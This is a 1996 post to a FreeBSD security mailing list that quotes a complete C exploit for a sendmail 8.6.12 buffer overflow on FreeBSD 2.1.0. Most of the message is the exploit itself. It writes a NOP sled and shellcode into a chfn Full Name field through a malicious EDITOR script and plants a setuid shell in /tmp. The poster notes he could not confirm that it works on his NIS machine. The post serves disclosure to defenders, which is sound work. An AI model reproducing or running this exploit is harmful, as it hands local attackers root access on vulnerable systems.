Date:      Fri, 27 Sep 1996 01:24:28 +0200
From:      Stefan Zehl <sec@wg.camelot.de>
To:        security@freebsd.org
Subject:   Re: Exploit for sendmail security hole (version 8.6.12 for FreeBSD
Message-ID:  <199609262324.BAA24530@matrix.wg.camelot.de>

I could not confirm the following for FreeBSD 2.1.0R while running NIS;
I will try on a non-NIS machine tomorrow, but I think it might be
of interest anyway :)

: /*                               Hi !                                       */
: /* This is exploit for sendmail bug (version 8.6.12 for FreeBSD 2.1.0).     */
: /* If you have any problems with it, send letter to me.                     */
: /*                             Have fun !                                   */


: /* -----------------   Dedicated to my beautiful lady   ------------------  */
: /* Leshka Zakharoff, 1996. E-mail: leshka@chci.chuvashia.su                 */

: #include <stdio.h>
: main()
: {
: void make_files();
:      make_files();
:      system("EDITOR=./hack;export EDITOR;chmod +x hack;chfn;/usr/sbin/sendmail;echo See result in /tmp");
: }

: void make_files()
:  {
:   int i,j;
:   FILE *f;
:   char nop_string[200];
:   char code_string[]=
:                       {
:                          "\xeb\x50"                         /* jmp    cont */

: /* geteip: */            "\x5d"                             /* popl   %ebp */
:                          "\x55"                             /* pushl  %ebp */
:                          "\xff\x8d\xc3\xff\xff\xff"         /* decl   0xffffffc3(%ebp) */
:                          "\xff\x8d\xd7\xff\xff\xff"         /* decl   0xffffffd7(%ebp) */
:                          "\xc3"                             /* ret */

: /* 0xffffffb4(%ebp): */ "cp /bin/sh /tmp"
: /* 0xffffffc3(%ebp): */ "\x3c"
:                         "chmod a=rsx /tmp/sh"
: /* 0xffffffd7(%ebp): */ "\x01"
:                         "-leshka-leshka-leshka-leshka-"    /* reserved */

: /* cont:  */            "\xc7\xc4\x70\xcf\xbf\xef"         /* movl   $0xefbfcf70,%esp */
:                         "\xe8\xa5\xff\xff\xff"             /* call   geteip */
:                         "\x81\xc5\xb4\xff\xff\xff"         /* addl   $0xb4ffffff,%ebp */
:                         "\x55"                             /* pushl  %ebp */
:                         "\x55"                             /* pushl  %ebp */
:                         "\x68\xd0\x77\x04\x08"             /* pushl  $0x80477d0  */
:                         "\xc3"                             /* ret */
:                         "-leshka-leshka-leshka-leshka-"    /* reserved */
:                         "\xa0\xcf\xbf\xef"
:                      };

:   j=269-sizeof(code_string);
:   for(i=0;i<j;nop_string[i++]='\x90');
:   nop_string[j]='\0';

:   f=fopen("user.inf","w");
:   fprintf(f,"#Changing user database information for leshka\n");
:   fprintf(f,"Shell: /usr/local/bin/bash\n");
:   fprintf(f,"Location: \n");
:   fprintf(f,"Office Phone: \n");
:   fprintf(f,"Home Phone: \n");
:   fprintf(f,"Full Name: %s%s\n",nop_string,code_string);
:   fclose(f);

:   f=fopen("hack","w");
:   fprintf(f,"cat user.inf>\"$1\"\n");
:   fprintf(f,"touch -t 2510711313 \"$1\"\n");
:   fclose(f);
:  }

CU,
	Sec

--
 Jeder Tag an dem du nicht lächelst, ist ein verlorener Tag. (C. Chaplin)
          Hiroshima '45    Tsjernobyl '86   Windows '95
          Black holes are where GOD is dividing by zero


